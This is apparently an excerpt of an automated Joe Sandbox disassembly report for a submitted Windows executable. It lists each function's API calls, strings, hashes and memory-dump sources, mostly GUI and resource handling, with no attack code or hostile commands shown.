Part of subcall function 00408946: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040897E
Part of subcall function 00408946: GetDlgItem.USER32(?,000004B8), ref: 004089A2
Part of subcall function 00408946: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 004089AF
Part of subcall function 00408946: wsprintfW.USER32 ref: 004089CF
Part of subcall function 00408946: GetDlgItem.USER32(?,000004B5), ref: 004089ED
Part of subcall function 00408946: ??3@YAXPAX@Z.MSVCRT(?), ref: 00408A7B

Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040932F), ref: 00408F69
Part of subcall function 00408F3F: LoadIconW.USER32(00000000), ref: 00408F6C
Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000032), ref: 00408F80
Part of subcall function 00408F3F: GetSystemMetrics.USER32(00000031), ref: 00408F85
Part of subcall function 00408F3F: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040932F), ref: 00408F8E
Part of subcall function 00408F3F: LoadImageW.USER32(00000000), ref: 00408F91
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000001,?), ref: 00408FB1
Part of subcall function 00408F3F: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408FBA
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FD7
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00408FE1
Part of subcall function 00408F3F: GetWindowLongW.USER32(?,000000F0), ref: 00408FED
Part of subcall function 00408F3F: SetWindowLongW.USER32(000000F0,000000F0,00000000), ref: 00408FFC
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 0040900A
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B5), ref: 00409018
Part of subcall function 00408F3F: GetWindowLongW.USER32(000000F0,000000F0), ref: 00409024
Part of subcall function 00408F3F: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00409033
Part of subcall function 00408F3F: GetDlgItem.USER32(?,000004B2), ref: 00409040

GetDlgItem.USER32(?,000004B5), ref: 004094A3
GetWindowLongW.USER32(00000000,000000F0), ref: 004094A8
GetDlgItem.USER32(?,000004B5), ref: 004094B8
SetWindowLongW.USER32(00000000), ref: 004094BB
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004094E1
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 004094F3
GetDlgItem.USER32(?,000004B4), ref: 004094FD
SetFocus.USER32(00000000), ref: 00409500
SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040952F
CoCreateInstance.OLE32(0041C84C,00000000,00000001,0041BFE4,?), ref: 00409554
GetDlgItem.USER32(?,00000002), ref: 00409575
IsWindow.USER32(00000000), ref: 00409578
GetDlgItem.USER32(?,00000002), ref: 00409588
EnableWindow.USER32(00000000), ref: 0040958B
GetDlgItem.USER32(?,000004B5), ref: 0040959F
ShowWindow.USER32(00000000), ref: 004095A2

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Item$Window$Long$MessageSend$System$EnableHandleLoadMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTextTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
String ID:
API String ID: 957878288-0
Opcode ID: 7faac37edcd208d7f3d635246ce9092851c04d018622aa74b3308d040a587b32
Instruction ID: 91ef2c87c7f5044bd2a8179c9000c8a4a1c30ad634a6280c3a66f42eddf6a5f2
Opcode Fuzzy Hash: 7faac37edcd208d7f3d635246ce9092851c04d018622aa74b3308d040a587b32
Instruction Fuzzy Hash: 794175B4604708BBEA216F26DD49F5B7B9DEB40B04F04843DF955A22E1CB79AC10CB2D

Function 00405112 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 256COMMON

Download Yara Rule

APIs

Part of subcall function 00411743: ??2@YAPAXI@Z.MSVCRT(00000004,0041E844,004065C3,00000000,0041E844,0041E844), ref: 0041174B

??3@YAXPAX@Z.MSVCRT(?,00000000,0000FDE9,?,00920F20,00000000), ref: 00405197
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000FDE9,?,00920F20,00000000), ref: 0040519F
??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040539D
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 004053A5
??3@YAXPAX@Z.MSVCRT(?,?), ref: 004053C1
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000FDE9,?,00920F20,00000000), ref: 004053E2
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000FDE9,?,00920F20,00000000), ref: 004053EA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000FDE9,?,00920F20,00000000), ref: 004053F2

Strings

{\rtf, xrefs: 0040528D, 004052A2
SetEnvironment, xrefs: 00405315

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@
String ID: SetEnvironment${\rtf
API String ID: 4113381792-318139784
Opcode ID: 0e9b30d454d381ff44a26bf80db0083171be6676ef64e56021da3b2ac69a4e51
Instruction ID: 77d8a904bf1d7ff1cd0baf4dd30aa615c8c5e0bf9e93a58920d719d6b3547280
Opcode Fuzzy Hash: 0e9b30d454d381ff44a26bf80db0083171be6676ef64e56021da3b2ac69a4e51
Instruction Fuzzy Hash: 1C91BC30900609ABDB15DBA1C855BEFBBB1EF14304F2400ABE942772D2DB785E45DF99

Function 00403C19 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 121windowcommemoryCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00403C2E
lstrcmpiA.KERNEL32(?,STATIC), ref: 00403C45
GetWindowLongW.USER32(?,000000F0), ref: 00403C56
GetMenu.USER32 ref: 00403C69

Part of subcall function 004039F0: GetModuleHandleW.KERNEL32(00000000), ref: 00403A01
Part of subcall function 004039F0: FindResourceExA.KERNEL32(00000000,?,?), ref: 00403A1F
Part of subcall function 004039F0: FindResourceExA.KERNEL32(?,?,?,00000409), ref: 00403A36
Part of subcall function 004039F0: SizeofResource.KERNEL32(?,00000000), ref: 00403A49
Part of subcall function 004039F0: LoadResource.KERNEL32(?,00000000), ref: 00403A55
Part of subcall function 004039F0: LockResource.KERNEL32(00000000), ref: 00403A60

GlobalAlloc.KERNEL32(00000040,00000010,?,?,000000F0,?,?,00000040), ref: 00403C96
memcpy.MSVCRT(00000000,00000000,00000010,?,000000F0,?,?,00000040), ref: 00403CAB
CoInitialize.OLE32(00000000), ref: 00403CB4
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00403CC0
OleLoadPicture.OLEAUT32(?,00000000,00000000,0041C82C,?), ref: 00403CE5
GlobalFree.KERNEL32(00000000), ref: 00403CF5

Part of subcall function 00403AD9: GetWindowDC.USER32(00000000), ref: 00403AE8
Part of subcall function 00403AD9: GetDeviceCaps.GDI32(00000000,00000058), ref: 00403AF4
Part of subcall function 00403AD9: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00403B0D
Part of subcall function 00403AD9: GetObjectW.GDI32(?,00000018,?), ref: 00403B44
Part of subcall function 00403AD9: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B51
Part of subcall function 00403AD9: MulDiv.KERNEL32(?,00000003,00000002), ref: 00403B5D
Part of subcall function 00403AD9: CreateCompatibleDC.GDI32(?), ref: 00403B6B
Part of subcall function 00403AD9: CreateCompatibleDC.GDI32(?), ref: 00403B73
Part of subcall function 00403AD9: SelectObject.GDI32(00000002,?), ref: 00403B83
Part of subcall function 00403AD9: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00403B91
Part of subcall function 00403AD9: SelectObject.GDI32(00000000,00000000), ref: 00403B99
Part of subcall function 00403AD9: SetStretchBltMode.GDI32(00000000,00000004), ref: 00403BA1
Part of subcall function 00403AD9: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000002,00000000,00000000,?,?,00CC0020), ref: 00403BC0
Part of subcall function 00403AD9: GetCurrentObject.GDI32(00000000,00000007), ref: 00403BC9
Part of subcall function 00403AD9: SelectObject.GDI32(00000002,?), ref: 00403BD8
Part of subcall function 00403AD9: SelectObject.GDI32(00000000,?), ref: 00403BDE
Part of subcall function 00403AD9: DeleteDC.GDI32(00000002), ref: 00403BE9
Part of subcall function 00403AD9: DeleteDC.GDI32(00000000), ref: 00403BEC
Part of subcall function 00403AD9: ReleaseDC.USER32(00000000,?), ref: 00403BF2

GetObjectW.GDI32(00000000,00000018,?), ref: 00403D25
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00403D39
SendMessageW.USER32(?,00000172,00000000,?), ref: 00403D4B
GlobalFree.KERNEL32(00000000), ref: 00403D60

Strings

IMAGES, xrefs: 00403C71
STATIC, xrefs: 00403C3C

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: e5ee765c26b043088857a6b86632b5a939f6bbfc1f2247f6f7eb73e9a60df1c7
Instruction ID: 960f2b80fa602a6c7041f941df52aa7033470e9d81684b1270c43c97e0f3439f
Opcode Fuzzy Hash: e5ee765c26b043088857a6b86632b5a939f6bbfc1f2247f6f7eb73e9a60df1c7
Instruction Fuzzy Hash: 28416D71A01218BBCB219FA4CC48DEFBF7DEF09751F108066F515B2290D7398A51DB6A

Function 00407BD3 Relevance: 27.3, APIs: 18, Instructions: 297COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 00407BFB
GetWindowLongW.USER32(00000000,000000F0), ref: 00407C00
GetDlgItem.USER32(?,000004B4), ref: 00407C37
GetWindowLongW.USER32(00000000,000000F0), ref: 00407C3C
GetSystemMetrics.USER32(00000010), ref: 00407CBE
GetSystemMetrics.USER32(00000011), ref: 00407CC4
GetSystemMetrics.USER32(00000008), ref: 00407CCB
GetSystemMetrics.USER32(00000007), ref: 00407CD2
GetParent.USER32(?), ref: 00407CF4
GetClientRect.USER32(00000000,?), ref: 00407D06
ClientToScreen.USER32(?,?), ref: 00407D19
SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 00407D7F
GetDlgItem.USER32(?,000004B1), ref: 00407D9E
SetWindowPos.USER32(00000000), ref: 00407DA5
GetClientRect.USER32(?,?), ref: 00407E25

Part of subcall function 00407BA4: GetDlgItem.USER32(?,?), ref: 00407BC2
Part of subcall function 00407BA4: SetWindowPos.USER32(00000000), ref: 00407BC9

ClientToScreen.USER32(?,?), ref: 00407D22

Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A31

GetSystemMetrics.USER32(00000008), ref: 00407EAA
GetSystemMetrics.USER32(00000007), ref: 00407EB1

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: MetricsSystem$ItemWindow$Client$LongRectScreen$Parent
String ID:
API String ID: 2671006076-0
Opcode ID: 4741c276581009abfc9ca523c20e9ec6d8d94d55c1504a4e144b8b0e00fc264d
Instruction ID: 7001ee707cf972b195794562609621f769ecf2f41514bcadc40e6201da9538ee
Opcode Fuzzy Hash: 4741c276581009abfc9ca523c20e9ec6d8d94d55c1504a4e144b8b0e00fc264d
Instruction Fuzzy Hash: 3CA11A71E04209AFDB10CFBDCD85AAEBBF9EF48704F148529E505F2291D778E9008B65

Function 004176DE Relevance: 19.9, APIs: 13, Instructions: 398COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00417768
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00417770
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00417778

Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,00000000,004178C8,?,?,?), ref: 004156AD
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,004178C8,?,?,?), ref: 004156B5
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(40000000,?,?,00000000,004178C8,?,?,?), ref: 004156BD
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156C5
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156CD
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156D5
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156DD
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156E5
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156ED
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156F5
Part of subcall function 004156A7: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156FD

??2@YAPAXI@Z.MSVCRT(00000014,?,?,?,?,?), ref: 004177D4

Part of subcall function 00414DA0: ??3@YAXPAX@Z.MSVCRT(?,00000000,004178A5,?,?), ref: 00414DB3

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@$??2@
String ID:
API String ID: 4113381792-0
Opcode ID: 7c2402dd2d2612712331e06f43e5c3b6258d2d67975131c9b8b2d2ffc34a34aa
Instruction ID: e009749836a5b8c521700d779fd130da81b0f30b20586917bece67503c0bf7cf
Opcode Fuzzy Hash: 7c2402dd2d2612712331e06f43e5c3b6258d2d67975131c9b8b2d2ffc34a34aa
Instruction Fuzzy Hash: 91F117719002499FCB25DF69C8809EE7BF6BF48344F14406EF81997262DB39E985CF58

Function 00415AA4 Relevance: 18.0, APIs: 12, Instructions: 32COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?), ref: 00415AAE
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00415AB9
??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00415AC4
??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00415ACF
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00415ADA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00415AE5
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00415AF0
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00415AFB
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00415B03
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?), ref: 00415B0B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?), ref: 00415B13
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00415B1B

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: e68277fbd99c3745330440203d9bef5d83ad1bd86ee1276d15dbf0581265652b
Instruction ID: aedf86548abd3be3b1bfa100c5c76d75fd36fa784b4736098e5a7a93d74d5829
Opcode Fuzzy Hash: e68277fbd99c3745330440203d9bef5d83ad1bd86ee1276d15dbf0581265652b
Instruction Fuzzy Hash: 29F05930110A11BAE6123732DC1ABDAB6B7AF40304F04442FF59B50435CB557CD1D75D

Function 00408190 Relevance: 16.6, APIs: 11, Instructions: 88windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0040819E
GetWindowLongW.USER32(00000000), ref: 004081A5
DefWindowProcW.USER32(?,?,?,?), ref: 004081BB
CallWindowProcW.USER32(?,?,?,?,?), ref: 004081DC
GetSystemMetrics.USER32(00000031), ref: 004081EE
GetSystemMetrics.USER32(00000032), ref: 004081F5
GetWindowDC.USER32(?), ref: 00408207
GetWindowRect.USER32(?,?), ref: 00408214
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00408248
ReleaseDC.USER32(?,00000000), ref: 00408250

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 83057c79f2c88d391f1805632dc92285a4e3022d2fadc16537eed77f9a906b47
Instruction ID: f279ad638593bb0c02c28414326814beda2d9d37ba4553b1ab7b6853af478c25
Opcode Fuzzy Hash: 83057c79f2c88d391f1805632dc92285a4e3022d2fadc16537eed77f9a906b47
Instruction Fuzzy Hash: 08310A7650120ABFDB019FB8DE48EEF3B69FB08351F008525FA11E6291CB75D920DB65

Function 004156A7 Relevance: 16.5, APIs: 11, Instructions: 27COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,00000000,004178C8,?,?,?), ref: 004156AD
??3@YAXPAX@Z.MSVCRT(?,?,00000000,004178C8,?,?,?), ref: 004156B5
??3@YAXPAX@Z.MSVCRT(40000000,?,?,00000000,004178C8,?,?,?), ref: 004156BD
??3@YAXPAX@Z.MSVCRT(?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156C5
??3@YAXPAX@Z.MSVCRT(?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156CD
??3@YAXPAX@Z.MSVCRT(?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156D5
??3@YAXPAX@Z.MSVCRT(?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156DD
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156E5
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156ED
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156F5
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,40000000,?,?,00000000,004178C8,?,?,?), ref: 004156FD

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8lOT1rXZp5.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: b95c2f54f42df379709473a9b97638e1ea7083fb856c4dc08ffcd234219093be
Instruction ID: 89fa2ea9e7dfd86616dbeeb867654c6fb378e0e89a7fbb9e23d32919dde88c48
Opcode Fuzzy Hash: b95c2f54f42df379709473a9b97638e1ea7083fb856c4dc08ffcd234219093be
Instruction Fuzzy Hash: 66F0EE314115127EEB623B23DD1B9867AB3BF04718358552EF84710C3ADB567CE1DA4C

Function 004095CA Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 73windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00409278: memset.MSVCRT ref: 004092CA
Part of subcall function 00409278: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004092DE
Part of subcall function 00409278: SHGetFileInfoW.SHELL32(?,00000000,00000000,000002B4,00000103), ref: 004092FE
Part of subcall function 00409278: GetDlgItem.USER32(?,000004B7), ref: 00409311
Part of subcall function 00409278: SetWindowLongW.USER32(00000000,000000FC,Function_00008190), ref: 0040931F

Part of subcall function 00407ABB: GetDlgItem.USER32(?,?), ref: 00407AC8
Part of subcall function 00407ABB: ShowWindow.USER32(00000000,?), ref: 00407ADF

Part of subcall function 00407A29: GetDlgItem.USER32(?,?), ref: 00407A31

GetDlgItem.USER32(?,000004B6), ref: 0040960C
DestroyWindow.USER32(00000000), ref: 0040960F
CreateWindowExA.USER32(00000200,Edit,0041AE2A,500100A0,?,?,?,?,?,000004B6,00000000,00000000), ref: 00409645
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00409655
GetDlgItem.USER32(?,000004B6), ref: 00409662
SendMessageW.USER32(00000000,00000030,?,00000001), ref: 0040966C
GetDlgItem.USER32(?,000004B6), ref: 00409676
SetFocus.USER32(00000000), ref: 00409679

Strings

Edit, xrefs: 0040963B

Memory Dump Source

Source File: 00000000.00000002.2333174445.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2333147637.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333205147.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333231508.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333257258.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
